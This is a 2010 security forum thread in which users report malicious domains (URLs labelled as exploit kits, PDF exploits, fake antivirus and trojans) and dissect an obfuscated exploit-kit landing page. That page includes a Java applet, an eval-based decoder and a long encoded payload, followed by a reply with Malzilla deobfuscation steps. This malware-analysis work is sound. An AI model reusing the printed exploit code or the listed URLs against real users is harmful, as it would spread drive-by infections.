http://onlinediller22.net/pek/fzdpxpfqfvaqisxrysf9.php
Exploit kit.
Code: [Select]
http://onlinediller22.net/pek/inczxrbphohpa5.pdf
Pdf exploit.
Code: [Select]
http://onlinediller22.net/pek/yr.php?i=8
Fake AV.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 05, 2010, 08:04:07 am
Code: [Select]
http://welescold.tk/?ID=19834
Redirects to exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 09, 2010, 11:00:42 pm
Code: [Select]
http://jnermovies.com/us.html
Iframes direct to exploits.
Code: [Select]
http://kojise.info/shop/anbwembretyzxnitju.php
http://onlinediller22.net/pek/fzdpxpfqfvaqisxrysf9.php
http://megaresolve.co.cc/news/index.php?author=try2&pg=196&table=undo
Exploit kits
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 11, 2010, 12:27:59 am
Code: [Select]
http://clean-domain.com/redirect.php?a=19776&s=MDctMTFnMg
Redirects to exploit kit
Code: [Select]
http://justdomain.in/dpcsjzi.php
Exploit kit
Code: [Select]
http://justdomain.in/fnb.php?i=8
Trojan
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 11, 2010, 08:34:02 pm
Code: [Select]
http://ozone777.com/2/bmauesknauxnyvxzkuyp.php
Exploit kit
Code: [Select]
http://ozone777.com/2/dojtfuatjrgo.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 13, 2010, 12:22:59 am
Code: [Select]
http://193.23.126.40/afi/fldwgmcwdof.php
Exploit kit
I tried a different technique to find the payload.
http://jsunpack.jeek.org/dec/go?report=fa9f319921bd0b2486dc2f2aea511117750a1d5e
So with this code, how can I find the payload?  Thanks.
Code: [Select]
<body id='hwdziz2' name='hwdziz2'><applet archive="hsgnivjwerbl1.jar" code="bpac.a.class"><param
name="a" value="RSS=,TTA+*IN*IANOIJETFY;TD?$I=R="/></applet></body>  <textarea>function
hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(//ig,String.fromCharCode(0x5*2)).replace(//ig,String.fromCharCode(0x2E*2));}document.write(String.fromCharCode(0x3c,112,62)+'1002'+String.fromCharCode(0x3c,112,47,62));var
gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var
czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa;
hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var
asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);</textarea>
 <textarea id='bogpc' name='bogpc'>String.fromCharCode(0x65,118,0x61,108);</textarea><textarea
id='aubqcsx' name='aubqcsx'>var bnfzxnh="dy<h=-0~=%5c%44%00%56%5f%8e%98%08%0f%5e%4e%00%80%05%0c%c5%c0%56%77%60%30%0c%00%03%f0%3c%01%00%8e%56%66%v%33%73s7%26%0=22%66'(utahl5`ea``)are.m(tK{{b.pgi)tttoc`hvi)tf(Mz`a~neOtMu`)4lun`.)=)``;yi`sFi`;e`y~Sreio~`i=m;~amb;.(.=tly`e`io;o4Ntu.={`agne```liuAHfpi(ol)iegpVoorunc.KyPNctg`assr`e}{je8`1`nIMsEpSue~a=`}`nmf`mSiu0*tfjz1fl`oe8e+e`u`heI~enhucblg=;ul0ib`;.){tdec(oeod-w''tMave28t`m`~eeertreTriem{ologn=c}nr)(q=0ta(re}c)dob<r}aEmde.)t=n`'tkiotrA'-EC.=e;e'o9.siv.,(e(cuy-cta'osec(`EF}dns00(otdn=ti'itdci(nSoi'dae'e'>'nlmife<ledddL'rejlbl64s{'A`e'c'f(4210aFE8Ce30337DF90AE9FF97C2C8944D035043887560E877F588F8F8805655F38013F8885705F55C0362370F49108E62637D7244143109BF2C20000900667016667764066646700000000000060m00066026iehvI=v(|',0aa8302722576320,aa8305673366620,aa8302222254220,aa8302255662260,aa8302422224620,aa8302244736660eF}uva;'et)aul)tEr]i=ilvef')|)ri3h`<msTcU}tbh.o1's)10y(`hxn0h)9)p301F504105D2E9000113E965C35BF5454529993A1929EEF3AAE58E4A545F5C0444DA13F1455160B67619A173010174030A222000A0022231DRo>Otc10)'ud0u00u10ue8ue6u8eu59u09u0fuaaueau20u10u06u02u22u30u41u94ue0u10u06u30u21uc4u11u20u02u0bu2eu65uau31u0Dk4uE6u0sFEu48;)nyxil3(`l++{lrmns0y`iveat`d;yihw3lias;yCnfo=r;uMMffnf{52mu>s``;<+}pou.Fs1e.tp`tg{zw`af`[}snes}paf`ee.=wOsr`l,Hhtp`var)g`3s=ozsU(u`s)tS{ncetnuu`nc4nF.jeoy~Sreio~`itIM`=)<ec~PNrXn;sn`2i0`u`1`csrx4oume0)emf.)l`s=70YwC%lcertllt`}no)ns0`n;ve=nu'c)b:Bi+;BLracB0h'ev'cmrsrociyvCe}n.S(=7aec`;)q`chr0([vr;ecd1ictPei(b;B~cs>.'oc(itc13rX`lvc)p3petae2elehn`jotf;roru'=CEcoti-5uc(ot`in;ooyulucWnd3=m=>=`<falecli/en)dcoc`reesaE5ur,S=.)u]d)7363r6676108F4F8CEBB3452C75A0B8A0103680CBB4464B95CE73BF00B382800F3928C4DBD0514C0540A5ED4E4863E373141523C972E9432BC83=000C9006D3941512454DA13F14175D0003912F01e2211C0E9vF.eN'=s|)0,mm2700265F842000mm270F9456DB1000mm2700383AE0AA10mm270999E8707700mm27090AA8B76000mm270956729F360pL}natp,(t;mmd{VS`+fltv.I`b;|{yf1vi=geIhIfrj.Gn0Wv|,,;'Si1ox);9{`0001600007B800F80060066407447667723676657366676646666666046456647646676660110000000000020000003D6DDD430400200006FSc<B=l10;%90%08%50%5c%0c%00%4f%50%80%09%89%06%ce%e0%e0%d8%55%07%47%66%7f%a0%ba%51%05%00%81%00%fc%25%66%2r73%62%d%33%73k3%32%f{c.Aso5h:```t;apegx.=fo)sy=(}poi``esi.}pUuCE=g}mfz)Ccuv6``m>u+(w``;ennvF.6mNae|r.se`+``utitcmteuruf`cf`fL.`ie`(i3rfarg{t=2i=cehTan=.;yktgt(y`nn(t4(eufIMup`tg{zw`afhc`b`;`wL)jeoqcitc4;f)ss10zB`n68tnp`0``u`l{l(~`c;bfiul3lniochuhcc{atxie}aE'dmdu;j0Cd'dy``rtF-=>=a`teHioltm{ehCi`Qt0=6tltqv;.u0<`,iiaebfuy0bauEnv'ody<lt<g)nu'btl16eMplat;e.hnerx))l)(c{ampii.f'mO`7Dac(d0F)u'c('m;nno.md)hF``0'`'<'v/rmoDaagovt.c)wloCcnts-5be`H`i!m;a{436F`4301=002DA37A26F86EFE1C3C47276C853850028850E1B4ED578CC55FF55C65538444F302C510E27767F3D64F2713F04C8B45533A2DE199'0000A00666466066066466766610000000000D00304026046el9r`W=v(|'1eeA906655273330,eeA502773327770,eeA506222227220,eeA502254626270,eeA505722254260,eeA902254636660lAccre.`'rpee(tecf))v([jn(l}(St`)hf9r{M`CuyeSe',In|01v%Cl0p1;f5m+9085E0110D7000F600C00455D0385EF24E0E35833AAE4428455E525255E4F9242945342955AA8FC819981932020311006000700FB052229CL(udJ0sC>vuc0ucbu70uf2u02u06u5fu00u92u15u05u1eu6aua0ua0u01uf8u04uc2u59u59ud0uddu0bu01u30u9bu00ufeue5uc4ue`09u9Eu2u26u02dAu0Fuuvtfl.c)e`=t2h}ytw)bf``i)i.`M;ens~sn.lv;eXmUF`ur`Co`U.na7=&`>b`whwve.(eaFv)pHgo|ili`~`m(nafre[rlsgnuttufuEz(+a~2s2ourg`sh``z`a`e3rc`z}pvh`o).=ttv;(awvuc`ne|r.se`+``rLby(fcfE;IMtltfre`}`{it62nP1`8;yce=8!ss1etcs)ue`Iug0c(l`oc)`ne(kblr2`w}rlsCeimve28t>oI=t``2D~'~l+>nTol`(ecXehf=ur,77csiqavlncztz=]radam);utsEt'idoIbiy/e.`moursD'aL..r(tn2pd(`e;`e`etvr:/fat)eB'-Ctu'`44;mOu'aed./lae(;((L=0Bnf/aapyewotshb`.i){eabatgrsA3stvS(n=emtt7266r7637'A001D24D1024D63DF91252B500BECBF374BB27CF39C08E3E103FF0505003D666FC3B60408F906C4AC454DD9EE46D7D903DF707005400000F00C58DE9649CE9453429562970021AA2031=270E90DEXa's9I'=s|)112F00AFEEA65140112F000423405300212F00B5958AE660412F009645704030412F00FE889F6070612F00BB46F86180aSat`Esfwi.bnprrri,[.'0otljesHb()s(3csE(Kn{cht)0N=('5au=e0=0mo<e`60006000F162200000600067666676707631742764646662667776674764566767667166100100000010011000000
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 13, 2010, 02:35:44 am
I had to exploit myself to get this.
Code: [Select]
http://193.23.126.40/afi/dz7.php?i=8
Trojan
I do not see dz7 in the code anywhere.
:(
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on December 13, 2010, 09:28:02 pm

I tried a different technique to find the payload.
http://jsunpack.jeek.org/dec/go?report=fa9f319921bd0b2486dc2f2aea511117750a1d5e
So with this code, how can I find the payload?  Thanks.


You have to deobfuscate the code first. I use Malzilla to do that. Malzilla requires that we modify the code a bit.

1.) Let's start at the end. Everything behind the last " can be deleted. So replace
Code: [Select]
</textarea><script>document.write('<font>eval</font>');this[document.getElementsByTagName('font')[0].innerHTML](document.getElementById('aubqcsx').value);this[eval(document.getElementById('bogpc').value)](document.getElementsByTagName('textarea')[0].value);</script>by semicolon.

2.) Continue at the beginning. Delete everything before the first textarea tag. That means deleting this code
Code: [Select]
<body id='hwdziz2' name='hwdziz2'><applet archive="hsgnivjwerbl1.jar" code="bpac.a.class"><param name="a" value="RSS=,TTA+*IN*IANOIJETFY;TD?$I=R="/></applet></body>
<textarea>

3.) Cut the code from the beginning (function) to the closing textarea tag. Now paste this code at the end of the script.
Code: [Select]
function hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}document.write(String.fromCharCode(0x3c,112,62)+'1002'+String.fromCharCode(0x3c,112,47,62));var gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa; hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);
4.) Goto start of the script. Delete everything from the start of the script to "var "
Code: [Select]
</textarea>

<textarea id='bogpc' name='bogpc'>String.fromCharCode(0x65,118,0x61,108);</textarea><textarea id='aubqcsx' name='aubqcsx'>

5.) Now go back to the code that we pasted at the end of the script. There is "document.write" instruction. In the mid of the instructions is a number.
     In your example it's 1002. Keep that number and delete the complete document.write instruction.

6.) Now go to the next instruction. In your example it is
Code: [Select]
gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML)replace right the expression of this instruction by the number your kept from the previous instruction. That means
Code: [Select]
gsyna=1002
7.) If you did all previous steps correctly, your code should look like this.
Code: [Select]
var bnfzxnh="dy<h=-0~=%5c%44%00%56%5f%8e%98%08%0f%5e%4e%00%80%05%0c%c5%c0%56%77%60%30%0c%00%03%f0%3c%01%00%8e%56%66%v%33%73s7%26%0=22%66'(utahl5`ea``)are.m(tK{{b.pgi)tttoc`hvi)tf(Mz`a~neOtMu`)4lun`.)=)``;yi`sFi`;e`y~Sreio~`i=m;~amb;.(.=tly`e`io;o4Ntu.={`agne```liuAHfpi(ol)iegpVoorunc.KyPNctg`assr`e}{je8`1`nIMsEpSue~a=`}`nmf`mSiu0*tfjz1fl`oe8e+e`u`heI~enhucblg=;ul0ib`;.){tdec(oeod-w''tMave28t`m`~eeertreTriem{ologn=c}nr)(q=0ta(re}c)dob<r}aEmde.)t=n`'tkiotrA'-EC.=e;e'o9.siv.,(e(cuy-cta'osec(`EF}dns00(otdn=ti'itdci(nSoi'dae'e'>'nlmife<ledddL'rejlbl64s{'A`e'c'f(4210aFE8Ce30337DF90AE9FF97C2C8944D035043887560E877F588F8F8805655F38013F8885705F55C0362370F49108E62637D7244143109BF2C20000900667016667764066646700000000000060m00066026iehvI=v(|',0aa8302722576320,aa8305673366620,aa8302222254220,aa8302255662260,aa8302422224620,aa8302244736660eF}uva;'et)aul)tEr]i=ilvef')|)ri3h`<msTcU}tbh.o1's)10y(`hxn0h)9)p301F504105D2E9000113E965C35BF5454529993A1929EEF3AAE58E4A545F5C0444DA13F1455160B67619A173010174030A222000A0022231DRo>Otc10)'ud0u00u10ue8ue6u8eu59u09u0fuaaueau20u10u06u02u22u30u41u94ue0u10u06u30u21uc4u11u20u02u0bu2eu65uau31u0Dk4uE6u0sFEu48;)nyxil3(`l++{lrmns0y`iveat`d;yihw3lias;yCnfo=r;uMMffnf{52mu>s``;<+}pou.Fs1e.tp`tg{zw`af`[}snes}paf`ee.=wOsr`l,Hhtp`var)g`3s=ozsU(u`s)tS{ncetnuu`nc4nF.jeoy~Sreio~`itIM`=)<ec~PNrXn;sn`2i0`u`1`csrx4oume0)emf.)l`s=70YwC%lcertllt`}no)ns0`n;ve=nu'c)b:Bi+;BLracB0h'ev'cmrsrociyvCe}n.S(=7aec`;)q`chr0([vr;ecd1ictPei(b;B~cs>.'oc(itc13rX`lvc)p3petae2elehn`jotf;roru'=CEcoti-5uc(ot`in;ooyulucWnd3=m=>=`<falecli/en)dcoc`reesaE5ur,S=.)u]d)7363r6676108F4F8CEBB3452C75A0B8A0103680CBB4464B95CE73BF00B382800F3928C4DBD0514C0540A5ED4E4863E373141523C972E9432BC83=000C9006D3941512454DA13F14175D0003912F01e2211C0E9vF.eN'=s|)0,mm2700265F842000mm270F9456DB1000mm2700383AE0AA10mm270999E8707700mm27090AA8B76000mm270956729F360pL}natp,(t;mmd{VS`+fltv.I`b;|{yf1vi=geIhIfrj.Gn0Wv|,,;'Si1ox);9{`0001600007B800F80060066407447667723676657366676646666666046456647646676660110000000000020000003D6DDD430400200006FSc<B=l10;%90%08%50%5c%0c%00%4f%50%80%09%89%06%ce%e0%e0%d8%55%07%47%66%7f%a0%ba%51%05%00%81%00%fc%25%66%2r73%62%d%33%73k3%32%f{c.Aso5h:```t;apegx.=fo)sy=(}poi``esi.}pUuCE=g}mfz)Ccuv6``m>u+(w``;ennvF.6mNae|r.se`+``utitcmteuruf`cf`fL.`ie`(i3rfarg{t=2i=cehTan=.;yktgt(y`nn(t4(eufIMup`tg{zw`afhc`b`;`wL)jeoqcitc4;f)ss10zB`n68tnp`0``u`l{l(~`c;bfiul3lniochuhcc{atxie}aE'dmdu;j0Cd'dy``rtF-=>=a`teHioltm{ehCi`Qt0=6tltqv;.u0<`,iiaebfuy0bauEnv'ody<lt<g)nu'btl16eMplat;e.hnerx))l)(c{ampii.f'mO`7Dac(d0F)u'c('m;nno.md)hF``0'`'<'v/rmoDaagovt.c)wloCcnts-5be`H`i!m;a{436F`4301=002DA37A26F86EFE1C3C47276C853850028850E1B4ED578CC55FF55C65538444F302C510E27767F3D64F2713F04C8B45533A2DE199'0000A00666466066066466766610000000000D00304026046el9r`W=v(|'1eeA906655273330,eeA502773327770,eeA506222227220,eeA502254626270,eeA505722254260,eeA902254636660lAccre.`'rpee(tecf))v([jn(l}(St`)hf9r{M`CuyeSe',In|01v%Cl0p1;f5m+9085E0110D7000F600C00455D0385EF24E0E35833AAE4428455E525255E4F9242945342955AA8FC819981932020311006000700FB052229CL(udJ0sC>vuc0ucbu70uf2u02u06u5fu00u92u15u05u1eu6aua0ua0u01uf8u04uc2u59u59ud0uddu0bu01u30u9bu00ufeue5uc4ue`09u9Eu2u26u02dAu0Fuuvtfl.c)e`=t2h}ytw)bf``i)i.`M;ens~sn.lv;eXmUF`ur`Co`U.na7=&`>b`whwve.(eaFv)pHgo|ili`~`m(nafre[rlsgnuttufuEz(+a~2s2ourg`sh``z`a`e3rc`z}pvh`o).=ttv;(awvuc`ne|r.se`+``rLby(fcfE;IMtltfre`}`{it62nP1`8;yce=8!ss1etcs)ue`Iug0c(l`oc)`ne(kblr2`w}rlsCeimve28t>oI=t``2D~'~l+>nTol`(ecXehf=ur,77csiqavlncztz=]radam);utsEt'idoIbiy/e.`moursD'aL..r(tn2pd(`e;`e`etvr•:/fat)eB'-Ctu'`44;mOu'aed./lae(;((L=0Bnf/aapyewotshb`.i){eabatgrsA3stvS(n=emtt7266r7637'A001D24D1024D63DF91252B500BECBF374BB27CF39C08E3E103FF0505003D666FC3B60408F906C4AC454DD9EE46D7D903DF707005400000F00C58DE9649CE9453429562970021AA2031=270E90DEXa's9I'=s|)112F00AFEEA65140112F000423405300212F00B5958AE660412F009645704030412F00FE889F6070612F00BB46F86180aSat`Esfwi.bnprrri,[.'0otljesHb()s(3csE(Kn{cht)0N=('5au=e0=0mo<e`60006000F1622000006000676666767076317427646466626677766747645667676671661001000000100110000000430666050100800006A)miE`iF<a55%44%45%e0%00%80%3c%c5%c5%05%56%5f%8e%98%08%0f%55%00%46%67%fa%b6%b8%00%50%ee%00%00%5f%54%66%06s7%26%0=22%66%+%23%6naiulm`;a0`h`it(yf{auf(d;nffae.(.Rt`vaae.M,XT0me+UE*Xpcr8``>`sviiiamnnsl,a`t`)f`nez&Asutdg`iot(sh-cnhGnunAgv+uo5.~tn``ii*a|e3t+d2g.fg;euitr;f`)`a`arfknL=to|ili`~`m(oEltcoouG}c~oCi`io+e(tz`~4sE0t8}ptc`)=it6nhoi;nbiCnt0o(chnk;<ea0.lsi1<ff`ethnveacB0h'cd`aoc530+_u`'tMn`=''oOce``ii36)heo`raee'/u/0``tyue;`tc+R.)dycduclbtoMebtii0)tHCA`'r(3?(qt's{x{)ia`•/d`p`{nJc0BcmO=49}eBmOp-etjkpnn}u)O`'rarpllao=Smihtj(gn;irsjs`t(iE5tuiPnd-noar0E99eAEF3400BFA88F61470458821A90F9864CC72FC200A8C71E7EEFE806FF552B33FC50007FEE0580C2266B33BF370D3EDD072E45536BC7871A00000200662666667677667166000000000004340'00046066Os)i,NW=v()5++B'7622226673'6++B'4672336766'8++B'7252522255'5++B'2554256767'7++B'5222552466'4++B'7545432276'cHtiplenibsot)ysif/1m.]i(vulvOn({a(4re(eTcstoV;,`=s)9r0u(0n0er0mS0F0B5000F6E6869602C00CE66CC13575030703E0845595AE93642145365F5312139346AE10D245D357619DF90005007090000D337512220CS;evCwd-/r35u00u06uf0u01ua0u22u22u22u5eue8ue6u8eu59u09u0fuadu00u14uf2u2eu56u5du30u60ub0u30u00u6fu5eu19u08k4uE6u0sFEu48u'uE4u9cronoa?tpx~i<sh).uvbnue(}(uutmnlver+ablmUo`Mj)et`XF`Mrt`9d0`4tadldlpeec2`l&y={`agne`lilhe](nfa0e(6.ciacncUOa)tl6N)ocs=nz2r|`2i```,puOe.Nsh~tuf{?rirgupcE`)f`nez&AsuswGoeorunbtL)tfo(nf`l(heb;)PN0h`;eix(;`z`~grdz}e~`icO2dsoY``w`spxlopn)`uudmbit'nrtF-=+u(orblD4~'Me';BL`=`Q)nbkc(pcn)6)({n=`rns)2`2;=be.lntieh=Sc;'.u(tkeuEnDnjebd-;eTrpsay'.i).`;.HeJ`or-s/z(pIttEl0AheB`E9}nJeBpspyaipt)c);A~`imyalurh'cao'=eien}fCsPe'h0d64rrdRae1tv)y3323=6266600F51C8D367D4EBAD72A132E14033C0518C3D3396DCBBFE3C8FF500002F0E8445F017019DFE8C62E6EE476E05F052BD78DEF7ECEB8800000101CEF5E6406439346AE7747200113B70F92200DE015bh.o0`I'=s{,''F+3864A9E781;,''F+0A204829A1;,''F+AAE6E861EE;,''F+3FEA5AA578;,''F+EB19EF98B6;,''F+EFA2E90036;e(co`et)duer.;{ip=;]a')nl=ys=WjlSsl)dt))Itv(cai11'v|,`8nn0o0m(xoC0A00206FFD576710B050067666666767363666672667776677640637467556666777646611110001000010000000000DA0000000D0400000H}n`Ti:AO`5%e0%e8%b0%00%0c%30%08%08%56%0c%0c%00%4f%50%80%09%00%66%07%78%b0%70%1a%0a%a4%90%00%80%bc%46%76%d%33%73k3%32%9%33%33t`nccx`hB1As`.i;fnoecnnMe0nnhpeeaqi`ll.pbvUoV{nu(MTUooidAix0;rltet2twwa(42`.`var)g`0lztif`tg`g,{t)ptsr.c(T(r{3e,H;tti=se`g`=7o~oc`rn(mqd.e)hnuv``+g,n(.Gf{`agne`lili(bcsu`ncchE;ykntg`assr`e}{je8i+e.o,si0eb;toeevs)<g2P8eidbP=h0c`2ecrg;3nn=e'l.)t``2D~'m'bgja58`<a=/dy`=`nu;tjOkcakg)){eF``m`gc;)=)``dEattr+(('(rg,am't==tlcAte(u:9tOTep`d{G1=;r=sCCcA{n`Jm17wNnr.Cs0'`nJ'-DetEnJlclpvte.;a;}D<hdeoroeavBrin`'cdtef(aio();,=D0(n)Avx`)i;{A1FD/5F285A00271E42B2BAADBA920BAE2E8086003C74C5C8070800F3CB75F18863C76058535E845C0F667638F76C7ECEBA444C90543A3084F4120000300066775747677776466110000000D00D02000066660j.Gn,9NW=vi058Ft6622256337}05CFt2626337662}058Ft6225222722}055Ft2224546676}055Ft2542225466}055Ft4244466776}()hn=mA;tttdb}vot/l.t);(v=ne=P3vHev)rT;{Min'krf20Wn|0n0eo/p0oa1r;4000010FFA127E06F0F10645C19E52E4AF66CC42E932325434546CA4C5270BC17034945567AA97EC7619A177000136000BBB081002122200(}ti`dC2Bf0ud3ubduf1u00u02u24u11u01u2au02u02u06u5fu00u92u15u00ud8u02u89ue3u03ubdu0du63u62u00u90ub3u4fu05u1u26u08dAu0Fu0u13u7Fis``,Amia5A.tvstuci,.caalxcc.twnlun~.estOtbvDttrUojbvtoiBgFxv(2h`h;yffpn)(0ffarg{t=xoeisi=y~S]`th/ri.bpt~3~`t2a`(}yiz`t`+;s=6n`uatoctpUTn`;icnaci+)`c~pbuvar)g`0lztz~ck~n(t4liG}pD(y~Sreio~`itIM`s`mhn`if)`e}hw`-ac;`t(`%`zeIr`ixa=0nka(f5ccdn;dc;.oc530<esj``s-8h'r~>oI=`nei}reb'orT(;`t)LMueztaw``;ityld#.y+'e')eg'pefo''telC.c'tB8rbPal=osE21se`.lPuVJ`u•b9.iatycTi0;(tEc19l.CtEiroea'nbtt}SFoeg=haw=myrin/w3t,Eruesds)`r`~-0o`;YiO?[e}v23636673/700151A93C4821C420E7D45A9CBCB0533A5B504EAEFB22FA1875FCD9530564050C5BB4040E4301937EC8CBC06B046C277AD04ADD8B'00000100C94674264C303494556676E0034090047220015E90eSe'1,`I'=f'96Fh56A36F2556i'E6Fh380F663780i'D6FhAA3E595EA4i'A6Fh49A8EA860Ai'A6Fh6F08ABF7A7i'E6Fh08957A4978fr;(``etpheAeofan=Avsc;l'f7x`7D.>Olf{ci'sEo=Swi`,,I=('o8sp2./rs2y}0000300FF4748800016006766776514726266666677176667166462746041666067176670001000000010000000000044666020430A00004)c.ditA4Jd%08%70%5e%80%80%f1%05%96%80%00%00%80%3c%c5%c5%05%50%06%64%74%2c%88%08%a0%cf%2f%a0%00%53%44%47%6=22%66%+%23%6072%67%ohe=`lass0Avha.hn`d`ptbtsb.tayf).eg,l~uyMfOtrh`nbvVOtongCi,Fan;`()}.uuee`(xuurg`sh`fc`p.n`p`t.ahi2oomariF2oih~u~3}poe~a=`}i`8`ctcattatr`egCs.cro`);~4zrcnarg{t=xoeieMl`)tv;(zsb;eDap`tg{zw`afhc`b.(pY(sz`{~`i*(l1raf1Oj+u+e.Ceul2p`0g`y2o04totd(reablD4~/nt;==s8Ae`s''cd`nuwccocj)nsi1}|r{AAn``hph{nd<u`edua{)s);{a.fpn'nMdomi(ctieD3yj'ti`d.T65.s'So(tAAJ`••3pnme`r'd-oe.Cl13scT.Cciy`-;dorc}WLbie'vmS'>oip'xi5>`lHnde'`.+eoc10be}(gf`'.faF2478E3Di50401C6080289EF31A099FCA6048487DC0E88504ED7EEE7F106038545C53B5FCFF10F85E0F7637B2726694053CBB07A151A8BBEBBA;000000014666566706067176670000000003F040F00366066'cht)109NW=()92Fe6722227673f)82Fe5666376666f)12Fe7222555222f)62Fe2524266256f)62Fe5222552476f)A2Fe2244566673de}eSdnt.'(trdurs(cfphsv'.1qi)Fp=W.>Szm,e(nnhaa(30N=s)p%c.)s2ys0[f0000100FF92700016CD00C3E190451C2FDFC1999434F01390CE9FC049EAE45C7F101693211E3A1F73A98173311100009F6662C2701222200;aw=dh8DEau03u08ueeu91u91ubcu02u5au10u01u01ua0u22u22u22u5eua0u05u21u35u90u5bu25ud0u63u76ud0u00ueeuccu15u8sFEu48u'uE4u904Fu1Aunem`hlx.e0Aailmic=(mrilheapic.u{ls``e;b.z`Mferc`OtDMft(iDt`)lu}?v{rfnn(w+nFnn``ii*a)a+lmene|rpris)tnegool`l`i)to2;en;sn`2iz2)sa`hgoigyc=wao.pt`u={tz(Volcrg`sh`fc`p+azs;`a`aU.ce.Cre|r.se`+``rLbyh(tbsie(t`af2~e3`po2Pm=0`-lipne0en0t+`,r;(ic(ode.pja58`'tbP``iCBi+h`+u(oul`kalte;tem6i|yFSKe==*ei`ue2`=mBspf{'{}vts'et)`Ainec)r'd(9A{e,ecpbt'.'op.as)eSVA=••.hder{e):0.)cTsD'er'cTapm=ddCdyh}FAjgMmy>cs<adt`-d5~eeTcc()=i`tbl10jdf)a(wBsur23727633;3030332B89E868113D28370C500B0B8D0D2B928E88ECBB5E819439D5000083F0FF02CD000FAEF37DDDBB096B90E20072724261E0BCv00001000DE99F91261F10169321A4B7001108092'22FE905E;toV;5,,`I's{B70sF7658888A5({B70sE1A2836664({D70s365AEFE485({E70s6F875870B8({E70sEB499FAB36({A70s39F5986B45a,e)Hotrs,'t'yn`([r=l(v=)j0af)(d8Pp=Hge4t)`eovb(6,`'v)`ual{u`=80ad0040063FF35200001860260770067666226677776746667766776206474056004764677010100010000000200000000000010100D0300000}tr'==A-Ct5e%78%8b%d5%f0%38%80%0f%0e%e0%00%0c%30%08%08%56%05%00%46%47%ff%00%01%1a%88%58%1c%00%e5%44%56%77k3%32%9%33%33'6%32%3`lpfeoAh`0~ls`es.`Msooe.{broofnietlon}sfo=z)MoapMfrz;yntEs1{2mv`aveucc~f`eFccs=nz2r`t`eedeo|iugs.)o(metnuce=s;3l7e.(itc4;fe5{inoe)to).P`frlxricn`thVantzt``ii*a)a+l8xUi}?rirUKlmNYgo|ili`~`m(oEltesyIhz`(h+```Mn8her4`p`0h1egae(0(e0h==`(`fou'c)aip`s-8h+.'r3'd1Dg`a+'m'bllATt`(c}rIe)f`{LHEs``2(ln.l7+`eeepob,}faee)n..iKs>nk{e)''6-vc'Oa..y,4,po/ve;(MAV`•t2po`nva;C0l{r'i1;{e)r'tte`eohy``c(Sehooo<raesgAtst';dmMt`)``n'ujsc~Pcu{t'iren`F6A64D12v0000C6AB1D4379D6ACE6B2AD8037360E90854E80FE8E06F4E665C443655F0677753E37F0FF6266B0D3BB332BBC4FA13145E18D108Da0000000066766666474764677010000000046004;00166475s(cai,109NWvf490a6622226377sfC50a2667366777sfE50a2522222225sf150a5224226766sf150a2225552666sfE90a2544526673tll{Oc(ie`hr,.cl)^olif=p)o)v`&'f0Dd9O.o0T;Fwcels'29Wn{=0penb-n9;sa00300FEFF1CE41002C3031A439CC0D91FF2190349036C343C643204F34D8949854C9534665A4B60179419106113201108CF12BA001022210ecijP094Ta28u8bubeu6euf0u50u92u2fu1aua0u00u02u24u11u01u2au0eu00uc9u13u7du23u2fubbu59ue5uf6u00u8fuc4u45u20dAu0Fu0u13u7F;8u2Fu9Qltuacle?0;..+m.pfagtn`aveonsucfneengrtuE`o{fwnaz-eo}pusF.)n``awlatn22%u~wF.ti=se`g!i~`m)wf`ns..n;tt[(o(saa`.t2e6mnafre`}``6tznf~;yn;fcfubldooot0hinr~oUis=nz2r`t`e`iUzv``+gJFzpiw)f`nez&AsuswGoeai.Cee?sr`m(>ag)Y(`/+eu2e3ntrsb)~w)```0viinmdu;tde=s8Ae`g)e5<=7Dh'l`<exjl;cic='tconV.`(sA1Hcn0)'euse0`dnhrerdwwurEt;dgidEp~t(va;,cC0at'btCsp'0fen/e(}tBSA'we3?w=eatoA0ave)d-ova;e)ian'pci.{(a)Hctvvapimmgecyhh>fdeLi&.=edorPif`o;nvoMnincl32327622a8C24846A544C4F4EE9A030DF19004C3393BF483EB2B8569E8EEA0508800FC654653B37F9FF5F28076E66E526624148D24C1CDED9F4r0000000715356DD1F354C9534660672010072207v2235E074v'krf06,,`I=d8FFm9CA49AE488vd8FFm478346AA03vd8FFm0EA669436Evd8FFmE866A067E3vd8FFm613F4F6A67vd8FFm3FB3E07C85aisPWu'bt0ei`atv;,Fvtipa;i{c(&x'0Ff3Wpu0i'L`kFev)2,I=v`8enos`e9ast70000F8F109599000A0007406466467664773176766667176677666644446277766647450000000000000100000000050666040040600400lht'd`74>;5%33%87%0e%50%39%e0%05%05%08%80%80%f1%05%96%80%00%00%50%66%68%01%81%08%50%7e%a8%e0%15%05%76%26%+%23%6072%67%v%33%73Ucynp`la`)wlm=`xrut)o(=to)t((n3`gdnlternFfEiC`nro1ME;em`~s;u=&ri2luc`)un%fFpiz`t`+;=o`o[{``aghlme}yat)t)hcu0Nh~a8per`io+e(=`heo`;}p(